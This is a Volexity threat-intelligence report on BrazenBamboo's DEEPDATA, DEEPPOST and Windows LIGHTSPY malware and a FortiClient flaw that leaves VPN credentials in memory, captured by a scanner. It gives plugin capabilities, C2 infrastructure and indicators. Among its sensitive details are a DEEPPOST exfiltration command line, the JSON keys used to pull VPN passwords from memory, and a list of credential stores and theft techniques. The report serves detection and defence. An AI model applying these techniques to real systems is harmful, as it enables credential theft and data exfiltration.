www.volexity.com Open in urlscan Pro
2606:4700:20::ac43:4734  Public Scan

URL: https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-d...
Submission: On November 19 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

GET https://www.volexity.com/

<form role="search" method="get" class="search-form" action="https://www.volexity.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field placeholder-text" placeholder="SEARCH" value="" name="s" title="Search for:">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

Text Content

 * Request A Demo

 * Breach Assistance

 * Products
   * Products Overview
   * Volcano
   * Surge
 * Services
   * Services Overview
   * Incident Response
   * Network Security Monitoring
   * Proactive Threat Assessments
   * Threat Intelligence
   * M&A Cybersecurity Assessments
 * Company
   * About
   * News & Press
   * Careers
   * Internships
   * Resources
 * Blog
 * Contact


blog


BRAZENBAMBOO WEAPONIZES FORTICLIENT VULNERABILITY TO STEAL VPN CREDENTIALS VIA
DEEPDATA

November 15, 2024

by Callum Roxan, Charlie Gardner, Paul Rascagneres

Facebook Twitter Email



KEY TAKEAWAYS

 * Volexity discovered and reported a vulnerability in Fortinet's Windows VPN
   client, FortiClient, where user credentials remain in process memory after a
   user authenticates to the VPN.
 * This vulnerability was abused by BrazenBamboo in their DEEPDATA malware.
 * BrazenBamboo is the threat actor behind development of the LIGHTSPY malware
   family.
 * LIGHTSPY variants have been discovered for all major operating systems,
   including iOS, and Volexity has recently discovered a new Windows variant.

In July 2024, Volexity identified exploitation of a zero-day credential
disclosure vulnerability in Fortinet’s Windows VPN client that allowed
credentials to be stolen from the memory of the client’s process. This
vulnerability was discovered while analyzing a recent sample of the DEEPDATA
malware family. DEEPDATA is a modular post-exploitation tool for the Windows
operating system that is used to gather a wide range of information from target
devices. Analysis of the sample revealed a plugin that was designed to extract
credentials from FortiClient VPN client process memory. On July 18, 2024,
Volexity notified Fortinet about this vulnerability. Since the time of
Volexity's initial discovery and reporting to Fortinet, ThreatFabric and
Blackberry have each published reports that cover different aspects of some of
the content discussed in this post.  

Volexity attributes the development of DEEPDATA to a Chinese state-affiliated
threat actor that it tracks as BrazenBamboo. Volexity has observed links between
BrazenBamboo and three distinct malware families: LIGHTSPY, DEEPDATA, and
DEEPPOST. Volexity tracks BrazenBamboo as the developer of these malware
families and not necessarily one of the operators using them (there may be
many). Volexity has also identified a new Windows variant of LIGHTSPY that was
not previously documented at the time of writing.

This blog post details the use and functionality of DEEPDATA, with a key look at
zero-day exploitation of the FortiClient vulnerability, and how DEEPPOST is used
to exfiltrate files from compromised systems. This blog post also looks at the
recently discovered Windows variant of LIGHTSPY, including notable changes, and
the associated wider command-and-control (C2) infrastructure of the BrazenBamboo
threat actor.


MALWARE ANALYSIS

Volexity’s analysis began with discovery of an archive file named deepdata.zip
(SHA256:666a4c569d435d0e6bf9fa4d337d1bf014952b42cc6d20e797db6c9df92dd724) that
is tied to BrazenBamboo. This archive contains several files that are part of
two Windows malware families, which Volexity refers to as DEEPDATA and DEEPPOST.
Each malware family is analyzed in the sections that follow. Volexity also
separately obtained and analyzed a new Windows variant of LIGHTSPY that is
described further below.


DEEPDATA

As previously mentioned, DEEPDATA is a modular post-exploitation tool for
Windows that facilitates collection of sensitive information from a compromised
system. This tool must be run from the command line of a system by an attacker.
The DEEPDATA malware elements include the following:

Filename Description data.dll DEEPDATA Loader mod.dat DEEPDATA Virtual File
System (VFS) readme.txt File containing DEEPDATA Execution Options

The readme.txt file describes how to execute the DEEPDATA loader, along with
available parameters and a decryption key.



The key parameter is used by the DEEPDATA loader file to decrypt and load the
“core” components of the DEEPDATA malware family stored in the local VFS file
(mod.dat). These components will always execute and are not dependent on
additional parameters passed on the command line.

The core components of DEEPDATA include the following files:

 Filename Purpose frame.dll Shellcode – core orchestrator for plugin execution
ffmpeg.dll Contains Heaven’s Gate code to load 32-bit code in 64-bit processes
vertdll.dll Collects event logs iumdll.dll Library used to collect locally
stored WeChat data ucrtbase_enclave.dll Library used to collect locally stored
Feishu data d3dcompiler_47.dll Checks the running instant messaging apps (Line,
Feishu, WeChat)

The architecture of DEEPDATA’s loader, core, and plugins is shown below.



The core components are always included in the VFS files, but Volexity was only
able to find frame.dll stored on the C2 servers. While DEEPDATA plugins are
stored in the VFS files, they are also stored as their own dedicated files on
the C2 servers; they can be loaded from either location. The DEEPDATA plugins in
the VFS are decrypted using the same key as the other components in the VFS.

The overall plugin logic is the same as that seen in LIGHTSPY malware samples,
with the following exported functions used by the core orchestrator:

 * ExecuteCommand
 * GetPluginCommandID
 * GetPluginName
 * GetPluginVersion

DEEPDATA maintains configuration data within the VFS file with the following
files stored in an encrypted state:

Filename Description config.json Contains DEEPDATA configuration information
manifest.json Contains DEEPDATA plugin information manifest1.json Contains
DEEPDATA plugin information date.ini Purpose unclear, contains a single byte of
0x30

The manifest.json file is also stored on the C2 server but in an unencrypted
state.

Volexity identified a total of 12 unique plugins for DEEPDATA, which are
summarized below:

Plugin Name Plugin Capabilities AccountInfo Steal credentials from 18 different
sources on the compromised device. AppData Collect data from WeChat, WhatsApp
and Signal on the compromised device. Audio Record audio on compromised devices.
ChatIndexedDb Steal databases from WhatsApp and Zalo chat clients. FortiClient
Extract credentials and server information from process memory of FortiClient
VPN processes. Outlook Collect contacts and emails from local Microsoft Outlook
instances. SocialSoft Steal data from WeChat, Line, QQ, DingDing, Skype,
Telegram, and Feishu applications. SoftwareList List installed software,
folders, and files recursively from a base location. SystemInfo Gather basic
enumeration information from the compromised device. TdMonitor Hook Telegram to
retrieve messages from the application. WebBrowser Collect history, cookies, and
passwords from Firefox, Chrome, Opera, and Edge web browsers. WifiList Collect
details of stored WiFi keys and nearby hotspots.

As shown above, DEEPDATA supports a wide range of functionality to extract data
from victims’ systems. The observed functionality of several plugins is commonly
seen and includes items typically stolen from victim systems. However, Volexity
noted the FortiClient plugin was uncommon and investigated it further. Volexity
found the FortiClient plugin was included through a library with the filename
msenvico.dll. This plugin was found to exploit a zero-day vulnerability in the
Fortinet VPN client on Windows that allows it to extract the credentials for the
user from memory of the client’s process.

As seen in the code snippet below, the FortiClient plugin looks for the
username, password, remote gateway, and port from two different JSON objects in
memory.



This is similar to a previously documented vulnerability identified in 2016,
where credentials could be discovered in memory based on hardcoded offsets in
memory. The previous vulnerability does not have an associated CVE.

Volexity verified the presence of these JSON objects in memory and confirmed
this approach works against the latest version available at the time of
discovery (v7.4.0). Notably, the same approach does not work against older
versions of the Fortinet VPN client. Volexity reported this vulnerability to
Fortinet on July 18, 2024, and Fortinet acknowledged the issue on July 24, 2024.
At the time of writing, this issue remains unresolved and Volexity is not aware
of an assigned CVE number.


DEEPPOST

DEEPPOST is a post-exploitation data exfiltration tool used to send files to a
remote system. The following sample was analyzed:

Name(s) localupload.exe Size 618.5KB (633344 Bytes) File Type
application/x-dosexec MD5 533297a7084039bf6bda702b752e6b82 SHA1
20214e2e93b1bb37108aa1b8666f6406fabca8a0 SHA256
f4e72145e761bcc8226353bb121eb8e549dc0000c6535bfa627795351037dc8e VirusTotal
First Submitted N/A

DEEPPOST supports the following syntax:

> localupload.exe  c:\data_to_exfiltrate\  ip:port

Exfiltration is performed via HTTPS to a hardcoded API endpoint,
/api/third/file/upload/, usually on port 29983 (although this is not a default
and would be set by the operator at the command line).


LIGHTSPY BACKGROUND

The LIGHTSPY malware family was publicly documented in 2020, when Kaspersky and
Trend Micro reported on a mobile malware campaign targeting individuals in Hong
Kong. More recently, Lookout and ThreatFabric discussed LIGHTSPY mobile malware
campaigns. Lookout linked malware they call “DragonEgg” (LIGHTSPY) to another
malware family, WyrmSpy, and to a Department of Justice indictment regarding
APT41. The macOS variant of LIGHTSPY was discussed by Huntress and ThreatFabric,
with the latter also detailing some associated C2 management infrastructure.

To summarize what is known and reported, LIGHTSPY is a multi-platform malware
family with documented variants for Android, iOS, and macOS. Kaspersky and
ThreatFabric previously identified references to the existence of variants for
Windows, Linux, and Router, but they did not document further analysis.

Volexity was able to retrieve copies of LIGHTSPY written specifically for
Windows. In contrast to other LIGHTSPY variants, the Windows variant was not
encoded with the same incremental XOR algorithm. Rather, it was encoded with a
more complex algorithm that also included padding at the beginning of the files.
The architecture for the Windows variant of LIGHTSPY is different from other
documented OS variants. This variant is deployed by an installer that deploys a
library to execute shellcode in memory. The shellcode downloads and decodes the
orchestrator component from the C2 server (pic32.png for x86 and pic64.png for
x64 architecture).

The loader used for these samples is BH_A006, which has historically been used
to load other malware families. It is not clear whether this is a commercially
available loader or evidence of shared development capabilities across different
operators. A summary of the execution chain is below.



On first execution, the LIGHTSPY orchestrator sends a 102-byte UDP packet
starting with 0x1A5F2E1 followed by random bytes. LIGHTSPY expects the server to
reply with a packet starting with 0x2A5F2E1. If the server replies properly, an
account.bin file is created that contains the server answer, which has the same
format as a MAC address and is internally named "broadband account mac". If the
file already exists, the DNS request is not performed. This UDP handshake is
unique to the Windows variant.

Like its counterparts, the Windows variant of LIGHTSPY uses WebSocket and HTTPS
for communication, with WebSocket used for most JSON-based communications and
HTTPS for exfiltration. An interesting observation to note: The user-agent for
the HTTPS request is copy-pasted from the macOS variant, as shown below.



The orchestrator expects all plugins to export the following functions:

 * ExecuteCommand
 * GetPluginCommandID
 * GetPluginName
 * Initial
 * StopCommand
 * Time
 * UnInitial

Unlike the macOS variant, most of the code in the Windows variant is executed in
memory. The LIGHTSPY Windows plugins are summarized below:

Plugin Name Purpose Audio Records audio using the libavcodev library Browser
Collects cookies, history, stored credentials, and bookmarks from web-browsers
FileManager Provides CRUD operations for files on the device and convenience
methods for uploading data to the C2 server Keyboard Records keystrokes Screen
Records the user’s screen using the libavcodev library Software Collects
information on installed software and manages services Terminal Provides a
remote shell for the threat actor to execute commands Video Records webcam and
audio from the infected device


INFRASTRUCTURE


DEEPDATA C2 INFRASTRUCTURE

At the time of analysis, there were six C2 servers serving DEEPDATA payloads and
hosting DEEPDATA-related management applications. These servers were also
configured for DEEPDATA usage:

Port Function Technology 28443 DEEPDATA operator application, HTML title
“spack-info” Nginx 1.14.0, Django Rest Framework 28992 Hosts the various
DEEPDATA plugins & config files Nginx 1.14.0 28993 Communication channel for
DEEPDATA implants/plugins Nginx 1.14.0, Django Rest Framework

Three of the six hosts were also running an API endpoint on port 48993 that,
based on the API endpoints, appeared to be used for managing an instance of the
web-crawling framework Scrapy.

Volexity also identified four “keyboard-walk”-style strings used by BrazenBamboo
in the URL patterns for DEEPDATA infrastructure:

 * qweasdzxc
 * qazxswedcvfr
 * asdgdsfdsfasd
 * asdgdsfee

One DEEPDATA C2 server had an API endpoint serving a developer change log for
the malware. This log was written in Chinese, and the most recent entry was from
October 2023; the oldest entry was April 2022. A translated version of the
change log is provided in the Appendix.


LIGHTSPY C2 INFRASTRUCTURE

At the time of analysis, there were a total of 26 active hosts serving LIGHTSPY
payloads. They were always hosted on a URL path starting with the string
963852741. These servers host various artifacts used in both the development &
deployment of LIGHTSPY, including manifest files indicating the current version
available for download. When analyzing these manifest files, the last-modified
times indicated that LIGHTSPY’s development began in 2019 and continued to be
updated into 2024.

The LIGHTSPY C2 servers are less uniform than DEEPDATA, but generally the
plugins are hosted on ports 52202, 43202, or 54602. The C2 management
infrastructure is hosted on nearby ports (generally 43201, 53501, or 59501) but
uses different starting strings for the URL paths:

 * 963852iuy
 * 963852poi


OTHER BRAZENBAMBOO C2 INFRASTRUCTURE

BrazenBamboo infrastructure also hosts other applications not directly linked to
the LIGHTSPY and DEEPDATA malware families. Many are built using the Vue
framework and use a lazy loading method implemented by Vue to decrease loading
times to import JavaScript and CSS components. ThreatFabric’s report covered
some of the interesting aspects of these components. This functionality also
reveals evidence of additional unreported capabilities of the BrazenBamboo
threat actor, including the following:

 * A “Reptile” email theft platform
 * A proxy generation platform
 * A Big Data styled Analysis platform for stolen data, conveniently named
   联网大数据综合分析平台 (English translation: Internet Big Data Comprehensive Analysis
   Platform)
 * Several configurable delivery methods, which are shown below. Another version
   of this panel listed the vulnerability attack as the “0day attack” type.

There is substantial wording in these applications that would align with a
domestic surveillance intent for these capabilities. The user management aspects
of the panel also contain wording that suggests this tooling is used by multiple
third parties, such as requirements to input an organization when registering a
user and the extensive documentation on how to use the platform.


ATTRIBUTION & OVERLAPS


DEEPDATA AND LIGHTSPY

The DEEPDATA malware family has several overlaps with the LIGHTSPY malware
family:

 * Plugin file and export function names
 * Shared program database (PDB) development paths
 * Shared JSON formatting for C2 communications
 * Similar formats for JSON configuration files
 * Similar plugin code execution flow:



LIGHTSPY (left) and DEEPDATA (right) Audio.dll Plugins

The DEEPDATA and LIGHTSPY C2 infrastructure also has several overlaps:

 * Historically shared the same IP address for hosting plugins
 * Shared TLS certificates
 * Shared URL patterns for operator panels
 * Shared operator applications across C2 servers

Volexity assesses with a high degree of confidence that these two malware
families are developed by related entities and are suitable to be clustered
under the same threat actor alias.


PUBLIC REPORTING OVERLAPS

Several C2 IP addresses mentioned in public reporting have overlaps with
DEEPDATA infrastructure, including the following:

IP Address Mention in Public Reports Overlaps 103.27.109[.]217 Huntress’s &
ThreatFabric’s macOS reports Shares a self-signed TLS certificate with all
currently active DEEPDATA C2 servers 103.27.108[.]207 ThreatFabric’s Mobile
report Shares a self-signed TLS certificate with all currently active DEEPDATA
C2 servers 121.201.109[.]98 Lookout’s DragonEgg report Based on VirusTotal
Intelligence URL submissions, Volexity assesses with moderate confidence this
server historically hosted DEEPDATA plugins


AUDIT EXPOSED CREDENTIALS WITH VOLEXITY VOLCANO

Volexity Volcano is a powerful memory analysis framework that can help
investigate systems compromised by this threat actor’s malware. It can also be
used to proactively audit Windows, Linux, and macOS systems to identify other
applications that expose credentials in clear text. This is as easy as searching
memory for strings known to exist near the credentials, such as “remote_gateway”
in this case. Another technique is to search for known password values after
authenticating to a Fortinet VPN connection via FortiClient, and more
importantly, after an extended period of time, to check for passwords after
logging out. Volcano attributes memory pages back to their owning process or
kernel module, which helps associate activity back to applications that may not
handle passwords as securely as possible.


CONCLUSION

Volexity’s analysis provides evidence that BrazenBamboo is a well-resourced
threat actor who maintains multi-platform capabilities with operational
longevity. The breadth and maturity of their capabilities indicates both a
capable development function and operational requirements driving development
output. This evidence, combined with the architectural decisions BrazenBamboo
has made within their malware and related infrastructure, leads Volexity to
assess with medium confidence that BrazenBamboo is a private enterprise that
produces capabilities for governmental operators concerned with domestic
targets.

Some key elements supporting Volexity’s assessment are below:

 * The language used in the C2 operator infrastructure references domestic
   surveillance and law enforcement contexts.
 * There is a lack of operational security in the C2 infrastructure, which is
   typical of foreign intelligence operations.
 * The architecture decisions of DEEPDATA and LIGHTSPY are more typical of
   standard software development practices than malware families.
 * There is continued development and operation of LIGHTSPY despite a notable
   number of public reporting on its capabilities and indicators.
 * In recent years, this style of operation has become well publicized for
   China-based threat actors, with notable examples including Chengdu 404 and
   iSOON.

The timestamps associated with the latest payloads for DEEPDATA and LIGHTSPY are
evidence that both malware families continue to be developed. The backend
infrastructure maintained by BrazenBamboo to analyze the data retrieved by their
malware families offers insight into the scale of this collection, driving a
requirement for custom analyst software to analyze this data at scale.

To detect the malware used in this specific attack, Volexity recommends the
following:

 * Use the rules provided here to detect related activity.
 * Block the IOCs provided here.

> Volexity's Threat Intelligence research, such as the content from this blog,
> is published to customers via its Threat Intelligence Service. The details
> published in this post were shared with customers in a series of posts between
> February 2024 and August 2024. Volexity Network Security Monitoring customers
> are also automatically covered through signatures and deployed detections from
> the threats and IOCs described in this post.
> 
> --------------------------------------------------------------------------------
> 
> If you are interested in learning more about Volexity products and services,
> please do not hesitate to contact us.


APPENDIX


DEEPDATA ACCOUNTINFO PLUGIN TARGETS

Targeted Service Credential Theft Technique Baidu Net Disk In memory OneDrive By
hooking web requests in the legitimate process KeePass In memory, by using the
open-source tool KeeFarce QQ On disk Windows By using Mimikatz Mail Master On
disk, by querying an internal mail.db file Fox Mail On disk, by reading the
Account.rec0 file SquirrelSQL On disk, by reading the SQLAliases23.xml file
DBVisualizer On disk, by reading the dbvis.xml file OpenSSH On disk, by reading
the config and the ssh key files Mobaxterm In registry WinSCP In registry
SecureCRT On disk, by reading the configuration files Putty In registry Navicat
In registry DBeaver On disk, by reading the credentials-config.json file Xshell
On disk, by reading the sessions files Xftp On disk, by reading the sessions
files


DEEPDATA CHANGE LOG [ENGLISH TRANSLATION]

> {
> "count":18, "next":null, "previous":null, "results":[ {
> "id":23, "time":"2023-10-1310036", "content":"{\
> "title\":\"v3.2\",\"text\":\"1. Add tg local real-time monitoring;\\n2.tg
> secret capture and add template parameter configuration;\\n3. Repair the
> obtained Problems with data display;\\n4. Chat software adds telegarm
> display;\"}"
> }, {
> "id":22, "time":"2023-06-30151833", "content":"{\"title\
> ":\"v3.1\",\"text\":\"1. Opera Browser is added to the browser type\\n2.
> Yandex module is added to cookie crawler parsing\\n3. Whatapp parsing is
> redone\\n4. New Added signal chat software\\n5. Evidence collection mode and
> monitoring mode can be configured in the template\"}"
> }, {
> "id":21, "time":"2023-05-1218630", "content":"{\
> "title\":\"v3.0\",\"text\":\"1. Add a new monitoring version, the client is
> online in real time, and realize websocket communication;\\n2. Add the
> function of issuing environmental recording instructions;\ \n3. Add the online
> command issuance function for other functions; \\n4. Fix the problem of
> program blocking for continuous command issuance; \\n5. Optimize the recording
> command issuance interface; \"}"
> }, {
> "id":20, "time":"2023-01-2917537", "content":"{\"title\":\"V
> 2.1\",\"text\":\"1. Added data upload display for outlook emails \\n2. Fix a
> bug in outlook and support Onedrive acquisition.  \\n3. Fixed the process list
> upload size field out-of-range bug\"}"
> }, {
> "id":19, "time":"2022-11-1118244", "content":"{\"title\":
> \"V2.0\",\"text\":\"1. Added target instant messaging software forensic
> information, including: Enterprise WeChat; forensic content includes session
> information, session chat content, contact information, and chat files;\" "
> }
> "},{"id":17,"time":"2022-09-17185754","content":" {
> \"title\":\"V1.5.1\",\"text\": \"1. Added the ability to obtain network card
> and session information; \\n2. Fixed the bug of not being able to go online
> when the terminal mac is empty; \\n3. Remove batches of local data, drivers,
> users, and browser passwords; \\n4. Repair Bug in template configuration
> instructions not being executed;\\n5. Add new specified files (folders) to
> upload;\\n6. Add export cache files to chat software;\\n7. Add batch export of
> emails;\\n8. Fix system permission acquisition Bug in wx home directory
> failure;\"}"
> }, {
> "id":16, "time":"2022-08-29182530", "content":"{\"title\":\"V1.5\ ",
> \"text\":\"1. The program supports input parameter acquisition tasks, and adds
> module configuration, which can build in the default extraction function;\\n2.
> Modify the execution loading method and use rundll32 for loading;\\n3. Program
> Encryption processing;\\n4. Simple data extraction through anti-virus
> processing, loading data.dll through 360, etc.;\\n5. New template
> configuration function for the website;\\n6. Local data improvement data
> details: port status, service company Name, process command line parameters,
> etc.;\\n7. New chat software WhatsApp, zalo;\\n8. Other website bug fixes;\"}"
> }, {
> "id":15, "time":"2022-07 -1518245",
> "content":"{\"title\":\"v1.4\",\"text\":\"1. Add local data (service list,
> port list, user list, process list, Driver list) display\\n2. Fix the problem
> of incorrect content in downloading email data attachments\\n3. Fix the
> problem of data exported to csv wps when opening Chinese garbled
> characters\\n4. Fix the problem of incorrect user names when crawling Yahoo
> mailboxes\\ n5. Fix the problem of Baidu network disk crawling error\\n6. Fix
> the problem of JD crawling data not being associated\"}"
> }, {
> "id":14, "time":"2022-07-0910226",
> "content":"{\"title\":\"v1.3\",\"text\":\"1. When optimizing the local
> directory search, when the content contains special characters, the returned
> content is inaccurate\\n2. Optimize the timeout of deleting old data when
> re-parsing local directory files, and delete it in the celery task
> instead\\n3. Fix the problem of chromium browser obtaining mailbox
> cookies\\n4. Fix the problem of wx.mail.com, WeChat scan The problem of not
> crawling emails when logging into QQ mailbox with code\\n5. Fix the problem of
> crawling communication in QQ mailbox\\n6. Optimize file directory acquisition,
> from only obtaining c:/user to obtaining files under c drive All files outside
> the system folder\\n\"}"
> }, {
> "id":12, "time":"2022-07-0116723", "content":"{\"title\":\"v1
> .2.6\",\"text\":\"1. Add batch export of chat data including WeChat, Line,
> DingTalk, Skype, Feishu\\n2. Add batch export of browser data, including
> browsers History, browser cookies\\n3. Add export task display, export
> progress, and download functions.  \\n4. Fix the problem of WeChat voice files
> not being found\\n5. Fix the bug of obtaining the file directory under system
> permission\\n6. Automatically delete the file version after the output
> execution program is completed\\n7. Fix the Skype update version modification
> program Get cookie path\"}"
> }, {
> "id":11, "time":"2022-06-25101259", "content":"{\"title\":\"v1.2.5\",\"
> text\":\"1. Optimize the method of skype forensics from directly uploading
> TOKEN to directly uploading cookie files\\n2.Skype forensic information
> analysis module adds cookie file parsing operation\\n3. Add target machine
> file directory information upload, including File size data, supports
> searching for files or folders in specified directories\\n4. Fix the bug of
> losing Skype chat records when crawling files/voices/videos and other message
> records\\n5. Fix the problem of program crash when executing under system
> permissions\"} "
> }, {
> "id":10, "time":"2022-06-11122341",
> "content":"{\"title\":\"v1.2.4\",\"text\":\" 1. New target group
> management\\n2. New system user management and role management\\n3. New target
> forensic data deletion, including specific forensic batch data deletion
> (including data + files), all batch deletion, terminal Delete\"}"
> }, {
> "id":9, "time":"2022-06-04122318", "content":"{\"title\":\"v1.2.3\",\"text\
> ":\"1. New display of travel evidence collection data, including travel
> account information, order list, common consignee addresses (contact
> information)\\n2. New display of evidence collection documents, including
> records of previous evidence collection documents, and the number of evidence
> collection documents Re-analysis function\\n3. New log audit function,
> including the operation log of the platform system, the forensic log of the
> forensic tool, and the analysis log of the forensic file\"}"
> }, {
> "id":8, "time":" 2022-05-28122318",
> "content":"{\"title\":\"v1.2.2\",\"text\":\" 1. New target WIFI information
> collection, including surrounding wifi list, local WIFI password\\n2. Newly
> added e-commerce forensic data display, including e-commerce account
> information, order list, common harvest address (contact information)\"}"
> }, {
> "id":7, "time":"2022 -05-21122318",
> "content":"{\"title\":\"v1.2.1\",\"text\":\" 1. Added target instant messaging
> software forensic information, including Feishu and Skype ; Forensic content
> includes session information, session chat content, contact information, chat
> files\\n2. New instant messaging data display, including session information,
> session members, contact (friends) list, chat content, chat files, etc.,
> supported Various commonly used operating functions, such as session
> retrieval, chat content retrieval (including contextual viewing), chat file
> retrieval\"}"
> }, {
> "id":6, "time":"2022-05-14122318", "content
> ":"{\"title\":\"v.1.1.2\",\"text\":\" 1. Added target instant messaging
> software forensic information, including Line and DingTalk; forensic content
> includes session information , session chat content, contact information, chat
> files\\n2. New browser cookies are added to collect evidence on target network
> identity data information, including\\n 2.1 E-commerce forensics (such as
> JD.com, Taobao, Meituan)\\n 2.2 Travel evidence collection (Ctrip,
> Qunar.com)\\n3. New email forensic data display, including email account
> information, email folder information, email list, email EML content\"}"
> }, {
> "id":5, " time":"2022-05-07122318",
> "content":"{\"title\":\"v1.1.1\",\"text\":\"1. Add target instant messaging
> software forensic information, Including WeChat; forensic content includes
> session information, session chat content, contact information, and chat
> files\\n2. New browser cookies are added to collect evidence on the target
> network identity data information, including\\n 2.1. Email forensics (such as
> NetEase email, QQ mailbox, 139 mailbox, 189 mailbox, yahoo mailbox, hotmail
> mailbox, Gmail mailbox, etc.)\"}"
> }, {
> "id":4, "time":"2022-04-25122318", "content":"{
> \"title\":\"v1.1.0\",\"text\":\"1. Add target basic information collection,
> including machine name, IP address, Mac address, brand, model, operating
> system, resolution , memory, CPU, etc.\\n2. Add target browser data
> information, including browser access records, browser cookie information,
> browser password information\"}"
> }
> 
> ]
> }



APT, brazenbamboo, China, exploits, forticlient, Fortinet, Threat Intelligence
 * Search for:

 * RECENT POSTS
   
    * BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials
      via DEEPDATA
    * StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms
    * DISGOMOJI Malware Used to Target Indian Government
    * Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect
      Devices
    * Zero-Day Exploitation of Unauthenticated Remote Code Execution
      Vulnerability in GlobalProtect (CVE-2024-3400)

 * ARCHIVES
   
    * November 2024
    * August 2024
    * June 2024
    * May 2024
    * April 2024
    * February 2024
    * January 2024
    * September 2023
    * June 2023
    * March 2023
    * December 2022
    * August 2022
    * July 2022
    * June 2022
    * March 2022
    * February 2022
    * December 2021
    * August 2021
    * May 2021
    * March 2021
    * December 2020
    * November 2020
    * April 2020
    * March 2020
    * September 2019
    * November 2018
    * September 2018
    * August 2018
    * July 2018
    * June 2018
    * April 2018
    * November 2017
    * July 2017
    * March 2017
    * November 2016
    * October 2015
    * July 2015
    * June 2015
    * April 2015
    * October 2014
    * September 2014

 * TAGS
   
   memory forensics crimeware North Korea Scanning volcano 0day Exploit ivanti
   connect secure webshell China malware APT RCE exploits backdoor VPN
   pulsesecure Threat Intelligence vulnerabilities spear phishing

© 2024 Volexity. All Rights Reserved.
 * About
   * About Us
   * Blog
   * Privacy Policy
 * Solutions
   * Request A Demo
   * Products
   * Services

Contact

 * 11654 Plaza America Dr #774
   Reston, VA 20190-4700
 * 1-888-825-1975

Connect

 * 
 * 
 * 
 * 


This Website uses cookies, which are necessary to its functioning and required
to achieve the purposes illustrated in our Cookie Policy. By clicking the
button, you consent to our use of cookies.Agree & Close